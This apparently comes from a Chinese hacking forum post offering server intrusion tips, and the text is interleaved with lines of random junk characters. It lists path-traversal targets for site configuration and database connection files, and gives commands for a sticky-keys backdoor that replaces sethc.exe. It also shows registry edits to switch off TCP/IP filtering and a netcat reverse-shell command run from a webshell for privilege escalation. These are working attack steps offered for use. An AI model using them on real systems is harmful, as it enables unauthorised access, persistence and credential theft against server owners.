u+ j+ D9 P# H, N2 A. D0 @1 r( u
./include/conn.asp
3 E! P# {. [1 p- d. w
../../include/conn.asp
$ l0 y6 y- T1 Z# s5 q8 @
../include/conn.asp
; n; G' o: _" q V( C
../../../include/conn.asp
& n6 O- o8 x4 P
/include/config.inc.php
# p, [4 X4 P. t# ]% `) l8 ]* D
./include/config.inc.php
( b+ x/ a, P/ @* U4 U
../../include/config.inc.php
, C2 w! S# l6 y
../include/config.inc.php
/ q$ }: d% _# f. N( Q; m
../../../include/config.inc.php
4 B' T' O$ `5 g" N* M0 z6 @/ g
/inc/config.php
6 h! H6 Y! @! S& e$ _
../../inc/config.php
8 k0 Q, B/ x( N/ }+ A
../inc/config.php
) h ^2 y# {1 W# Z8 n
../../../inc/config.php
: x4 j& X3 H$ ~% J5 Z* W
/inc/config.inc.php
: U- Z `6 U' M% [* C/ B1 G1 {
./inc/config.inc.php
/ |6 A0 w4 v+ v# N/ P& h
../../inc/config.inc.php
! }9 Q/ X) {9 [. P, b; b5 E9 P: a
../inc/config.inc.php
1 ]0 s) h1 w t- D7 L4 t
../../../inc/config.inc.php
$ Q) O2 F4 [0 f4 Q
/inc/conn.php
8 e* g( E X2 \
./inc/conn.php
0 Z; U: Q2 y4 k B; ]
../../inc/conn.php
$ `" l/ X% [ L, h% z
../inc/conn.php
; j5 F0 l9 B7 P) @
../../../inc/conn.php
1 l/ ^/ b J( g/ E4 g8 n4 U' S
/inc/conn.asp
" f. a! k) j3 w4 h, p& W
./inc/conn.asp
/ a) m6 Y3 }% @& n
../../inc/conn.asp
( U8 }* r8 ^" g L; X) R
../inc/conn.asp
0 c* r" s: {6 p' w0 G; ~) y/ Y
../../../inc/conn.asp
2 A; `" [' n! P
/inc/config.inc.php
) I& m3 U( s6 E7 ?9 l# p( F
./inc/config.inc.php
( g; R) R/ r( I" Z* V
../../inc/config.inc.php
) S& \' t* N7 D9 A. {
../inc/config.inc.php
' m3 @6 o. S/ k! R( j$ v
../../../inc/config.inc.php
5 y! m2 S5 t& o
/index.php
0 d$ A9 O' D$ M! r
./index.php
, q' @6 B0 n+ L) V1 j1 c
../../index.php
+ U1 S# f- ]& B( E7 x: c; N, d, b) Z/ K
../index.php
* L2 X, ^1 K$ X: n" ]
../../../index.php
s/ t- i2 U- e$ s9 H9 P
/index.asp
: [8 E! o( E$ ]: B3 c1 }$ o# o
./index.asp
! o" r$ `1 k8 T' z& {
../../index.asp
0 t2 Y! G0 O, P
../index.asp
4 r7 H" k8 |1 U$ K4 x3 [3 O `" `: v1 J
../../../index.asp
2 r! d1 F3 F K; R2 h' N# N8 Y
替换SHIFT后门
+ v. N, p- {1 }/ r
attrib c:\windows\system32\sethc.exe -h -r -s
! Q0 Q* X6 _4 g5 m, f) \) x+ X9 U
* F r3 Y% C4 w8 y! q; `/ b# l
attrib c:\windows\system32\dllcache\sethc.exe -h -r -s
9 W# S" L4 D4 u! [% o- K% H8 b
0 @$ r9 W3 Y1 g6 m5 y( ^2 ^2 X; K, E
del c:\windows\system32\sethc.exe
, _2 U5 u: D B) s. a
( z' l2 h& v& B8 M, [$ g
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
7 |/ U( R) Z# g( ?
& p, a9 Z4 n1 x$ p( U3 f% L
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
$ ~7 @( b7 \8 s' J9 h/ r" z
2 R3 R+ N& g1 K2 y' C0 Q' x. ]- m
attrib c:\windows\system32\sethc.exe +h +r +s
( ~! o5 _5 b& {1 ~1 G- t
& c5 j- Z" t: ~+ D, c, ^
attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
- i! V! A/ E- x' Y+ y
去除TCPIP筛选
8 c- E% g3 o( {5 n8 ?+ }; ~5 K
TCP/IP筛选在注册表里有三处,分别是:
3 U+ ^0 Z6 o8 D1 s
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
# ~0 G9 Z. v" M7 ]) P7 x ^
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
H! X: ]. ?( E) G! `& I$ o" v8 r
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
. ~& E/ J7 O: C$ _
6 `/ H5 L. g+ i" g
分别用
" Z0 {9 v1 U9 P* O
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
2 F7 g' o- h8 _/ G3 v, p$ @$ ^; R* c% w
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
/ m' U1 J* T6 c; D5 J0 k* X5 {% d
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
; a% i F; j% R6 F6 N
命令来导出注册表项
. X$ e9 h9 @9 S3 N: R" }% L2 `
3 l, D8 k/ y1 \2 D8 q" L* B! d9 x# o6 s; b3 R
然后把 三个文件里的EnableSecurityFilters"=dword:00000001,改成EnableSecurityFilters"=dword:00000000
) g# `+ c8 L" {+ P
- x6 f+ r2 I, l8 c* y
再将以上三个文件分别用
" v) \1 |* ~ U. L; Y
regedit -s D:\a.reg
* C' M& g) r6 d- ]
regedit -s D:\b.reg
/ A/ H: v& o* K) D3 n
regedit -s D:\c.reg
, [& N/ L( d( p0 A6 \
导入注册表即可
$ f; F, v7 Q& t0 e6 O5 J8 ]+ K! ]! c
- ^5 o& }' b S; n
webshell提权小技巧
( i5 T. D1 L O( U# S
cmd路径:
% J! m! R+ z- C( T# F# a
c:\windows\temp\cmd.exe
& b2 W. g5 v0 X
nc也在同目录下
' V0 t, K* q& e H/ I
例如反弹cmdshell:
2 r# J& ?, d/ H, @! I9 {
"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"
; k- m; L3 D# ], A- P- ?
通常都不会成功。
- {" K' N) u" F8 N+ D: {
; K6 ~) X6 P( p7 L. G
而直接在 cmd路径上 输入 c:\windows\temp\nc.exe
* W: }) [9 n' S0 X
命令输入 -vv ip 999 -e c:\windows\temp\cmd.exe
: o. l4 Z# ^$ i P! m
却能成功。。
/ b" n( V& s* Q* v' h7 ~, e! _
这个不是重点
, y+ Q" B- C `7 N( i* g
我们通常 执行 pr.exe 或 Churrasco.exe 时 有时候也需要 按照上面的 方法才能成功
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2